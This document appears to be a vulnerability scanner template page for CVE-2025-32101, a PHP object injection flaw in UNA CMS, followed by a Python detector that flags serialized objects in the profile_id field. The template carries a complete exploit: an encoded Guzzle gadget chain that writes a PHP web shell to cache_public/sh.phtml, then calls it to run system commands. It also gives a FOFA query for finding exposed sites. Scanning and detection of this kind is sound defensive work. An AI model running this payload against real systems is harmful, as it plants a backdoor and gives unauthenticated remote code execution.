FOFA query
Official YAML
id: CVE-2025-32101

info:
  name: UNA CMS 14.0.0-RC - PHP Object Injection
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    The vulnerability is located in the /template/scripts/BxBaseMenuSetAclLevel.php script. Specifically, within the BxBaseMenuSetAclLevel::getCode() method. When calling this method, user input passed through the "profile_id" POST parameter is not properly sanitized before being used in a call to the unserialize() PHP function. This can be exploited by remote, unauthenticated attackers to inject arbitrary PHP objects into the application scope, allowing them to perform a variety of attacks, such as writing and executing arbitrary PHP code.
  reference:
    - https://www.exploit-db.com/exploits/52139
    - https://karmainsecurity.com/KIS-2025-01
  metadata:
    verified: true
    max-request: 3
    fofa-query: body="Powered by UNA"
  tags: cve,cve2025,una-cms,php,rce

variables:
  cmd: "echo '{{randstr}}'. system('id') . '{{randstr}}';"

http:
  - raw:
      - |
        POST /menu.php HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: XMLHttpRequest
        Content-Type: application/x-www-form-urlencoded

        o=sys_set_acl_level&a=SetAclLevel&level_id=1&profile_id=O%3A31%3A%22GuzzleHttp%5CCookie%5CFileCookieJar%22%3A3%3A%7Bs%3A40%3A%22%00GuzzleHttp%5CCookie%5CFileCookieJar%00cookies%22%3Ba%3A1%3A%7Bi%3A0%3BO%3A27%3A%22GuzzleHttp%5CCookie%5CSetCookie%22%3A1%3A%7Bs%3A33%3A%22%00GuzzleHttp%5CCookie%5CSetCookie%00data%22%3Ba%3A2%3A%7Bs%3A7%3A%22Expires%22%3Bs%3A0%3A%22%22%3Bs%3A5%3A%22Value%22%3Bs%3A49%3A%22%3C%3Fphp+eval%28base64_decode%28%24_SERVER%5B%27HTTP_X%27%5D%29%29%3B+%3F%3E%22%3B%7D%7D%7Ds%3A41%3A%22%00GuzzleHttp%5CCookie%5CFileCookieJar%00filename%22%3Bs%3A23%3A%22.%2Fcache_public%2Fsh.phtml%22%3Bs%3A52%3A%22%00GuzzleHttp%5CCookie%5CFileCookieJar%00storeSessionCookies%22%3Bb%3A1%3B%7D

    matchers:
      - type: status
        internal: true
        status:
          - 200

  - raw:
      - |
        GET /cache_public/sh.phtml HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: XMLHttpRequest
        X: {{base64(cmd)}}

      - |
        GET /cache_public/sh.php HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: XMLHttpRequest
        X: {{base64(cmd)}}

    stop-at-first-match: true
    matchers:
      - type: word
        part: body
        words:
          - 'Expires'
          - 'Value'
          - 'uid='
          - 'groups='
        condition: and

    extractors:
      - type: regex
        part: body
        internal: false
        name: id
        group: 1
        regex:
          - '{{randstr}}(.*){{randstr}}'
# digest: 4b0a00483046022100ed6e38e082455a41a9bec934b1e85c434af4c7987536b1e9e930e1d0cab86fd1022100fe8b85a7c6d4f7aa302a78889743504efe33b6347b10d687bba181a6cc4c17f0:922c64590222798bb761d5b6d8e72950
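
A defensive counterpart to the template's first request, as an added example (not part of the original page or the template authors' code): it inspects form-encoded POST bodies sent to /menu.php and reports any PHP object embedded in the serialized profile_id value, while letting plain scalars and arrays pass. The function names and the sample requests are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# PHP serialize() object markers: O:<len>:"Class":<count>:{ or C:<len>:"Class":<len>:{
PHP_OBJECT = re.compile(r'(?:^|[;{])[OC]:\d+:"([^"]+)":\d+:\{')
WATCHED_PARAM = "profile_id"   # parameter named in the template description
WATCHED_PATH = "/menu.php"     # endpoint used by the template's first request


def serialized_classes(value):
    """Return class names of PHP objects embedded in a serialized string."""
    return PHP_OBJECT.findall(value)


def inspect_request(method, target, body):
    """Return a finding dict if the POST carries a serialized object, else None."""
    if method.upper() != "POST" or urlsplit(target).path != WATCHED_PATH:
        return None
    # parse_qs percent-decodes values, including %00 in private property names
    fields = parse_qs(body, keep_blank_values=True)
    classes = []
    for value in fields.get(WATCHED_PARAM, []):
        classes.extend(serialized_classes(value))
    if not classes:
        return None
    return {"path": WATCHED_PATH, "param": WATCHED_PARAM, "classes": classes}


# Constructed sample requests (harmless stdClass objects, not the template payload)
SAMPLES = [
    ("POST", "/menu.php", "o=sys_set_acl_level&a=SetAclLevel&level_id=1&profile_id=42"),
    ("POST", "/menu.php", "o=sys_set_acl_level&a=SetAclLevel&level_id=1"
                          "&profile_id=O%3A8%3A%22stdClass%22%3A0%3A%7B%7D"),
    ("POST", "/menu.php?x=1",
     "profile_id=a%3A1%3A%7Bi%3A0%3BO%3A8%3A%22stdClass%22%3A0%3A%7B%7D%7D"),
    ("POST", "/menu.php", "profile_id=a%3A1%3A%7Bi%3A0%3Bi%3A7%3B%7D"),
]

if __name__ == "__main__":
    for method, target, body in SAMPLES:
        print(target, inspect_request(method, target, body))
```

The same check can run in a reverse proxy or log pipeline that has access to request bodies; it covers form-encoded bodies only.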